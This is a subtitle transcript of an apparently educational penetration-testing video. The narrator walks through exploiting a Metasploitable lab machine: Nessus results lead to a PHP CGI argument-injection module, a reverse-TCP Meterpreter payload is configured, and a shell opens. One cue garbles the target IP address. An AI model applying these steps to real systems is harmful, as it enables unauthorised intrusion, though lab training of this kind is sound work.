1
00:00:00,390 --> 00:00:04,380
So let's go back and view the Metasploitable HDB services.

2
00:00:05,340 --> 00:00:13,350
And I'm going to sort the results by port number. Now, the service running on port 80 will be my next

3
00:00:13,350 --> 00:00:14,520
service to exploit.

4
00:00:15,960 --> 00:00:18,150
And I want to check if Nessus found something.

5
00:00:19,670 --> 00:00:22,820
So type vulns -p.

6
00:00:24,140 --> 00:00:26,570
And the IP address of the target.

7
00:00:27,290 --> 00:00:30,650
Oh, yeah, there are many findings about this service.

8
00:00:32,570 --> 00:00:35,730
So you can go ahead and examine the results and search for where they are.

9
00:00:36,230 --> 00:00:39,860
Are they really vulnerabilities or are they not?

10
00:00:40,970 --> 00:00:51,500
And I see that arbitrary code execution. Well, this finding even has a CVE number.

11
00:00:52,680 --> 00:01:00,720
So you can search this number in Metasploit search, copy and paste the number, nothing.

12
00:01:02,910 --> 00:01:04,530
OK, so look at the other rows.

13
00:01:06,070 --> 00:01:07,710
All right, so let's copy this one.

14
00:01:09,540 --> 00:01:11,550
Let's search that in MSF.

15
00:01:14,160 --> 00:01:20,720
OK, yeah, so this is next week, so keep looking at the other lines as well.

16
00:01:21,970 --> 00:01:23,830
Another remote code execution.

17
00:01:26,750 --> 00:01:28,430
Yeah, OK, so this is what I want.

18
00:01:30,020 --> 00:01:32,290
But you can check the other lines as well.

19
00:01:33,620 --> 00:01:38,210
And the first one, with TWiki, is a little bit old.

20
00:01:40,020 --> 00:01:44,720
The CGI argument injection, I think that's the better one.

21
00:01:45,770 --> 00:01:47,180
So I'm going to use this.

22
00:01:49,130 --> 00:01:50,660
Show me the options.

23
00:01:52,210 --> 00:01:54,370
Let's show the payloads too.

24
00:01:56,390 --> 00:02:00,170
And use the reverse Meterpreter payload.

25
00:02:02,530 --> 00:02:07,720
Set RHOST to tend to tend to doubt one for.

26
00:02:08,710 --> 00:02:14,110
Set payload to PHP Meterpreter.

27
00:02:15,150 --> 00:02:17,880
Reverse TCP.

28
00:02:19,950 --> 00:02:21,120
Set LHOST.

29
00:02:23,420 --> 00:02:25,430
And LPORT also.

30
00:02:27,170 --> 00:02:33,640
And now let's show the options and make sure that everything is OK.

31
00:02:35,340 --> 00:02:39,510
All right, then, let's exploit.

32
00:02:41,380 --> 00:02:44,470
OK, the Meterpreter shell opened.

33
00:02:45,620 --> 00:02:50,800
So let's getuid to see just exactly who I am.

34
00:02:52,070 --> 00:02:55,270
sysinfo to view system information.

35
00:02:56,370 --> 00:02:59,460
And now these are Meterpreter commands.

36
00:03:00,470 --> 00:03:07,850
So in the next section, you're going to dive into Meterpreter. See you on the other side.